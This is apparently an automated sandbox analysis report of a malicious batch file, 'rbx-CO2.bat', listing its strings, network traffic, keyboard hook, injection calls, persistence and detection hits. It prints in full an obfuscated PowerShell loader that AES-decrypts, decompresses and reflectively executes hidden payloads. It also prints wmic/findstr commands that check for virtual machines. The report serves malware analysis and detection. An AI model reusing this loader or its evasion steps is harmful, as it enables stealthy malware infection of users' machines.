Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000000.2769648555.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: Amcache.hve.11.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000019.00000002.3432949177.0000021404730000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co.1mmi
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.8.dr String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A5B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 59173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59173
Source: unknown HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.6:59173 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 6444, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: rbx-CO2.bat Static file information: 5214429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE0C8 NtUnmapViewOfSection, 36_2_00007FFD343EE0C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE122 NtSetContextThread, 36_2_00007FFD343EE122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE142 NtResumeThread, 36_2_00007FFD343EE142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE0FA NtWriteVirtualMemory, 36_2_00007FFD343EE0FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE0A8 NtUnmapViewOfSection, 36_2_00007FFD343EE0A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343F0C7D NtWriteVirtualMemory, 36_2_00007FFD343F0C7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE098 NtUnmapViewOfSection, 36_2_00007FFD343EE098
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE132 NtSetContextThread, 36_2_00007FFD343EE132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343F0A5E NtUnmapViewOfSection, 36_2_00007FFD343F0A5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343F0F40 NtSetContextThread, 36_2_00007FFD343F0F40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343F1004 NtResumeThread, 36_2_00007FFD343F1004
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 38_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 39_2_000002D0165E2C80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-FHOIapsb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_f4o4oimb.n1j.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2683
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5477
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2683
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: Process Memory Space: powershell.exe PID: 6444, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}(
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.49.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4lt
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.49.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exeh
Source: System.evtx.49.dr Binary string: C:\Device\HarddiskVolume3`&
Source: System.evtx.49.dr Binary string: C:\Device\HarddiskVolume3
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeP**
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: N\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.49.dr Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.49.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe8
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.49.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4A
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine Classification label: mal100.spyw.evad.winBAT@56/86@2/2
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString, 38_2_000000014000217C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\3259231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7088
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\4569933
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\2180219
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6444
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbml4rjv.f1d.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
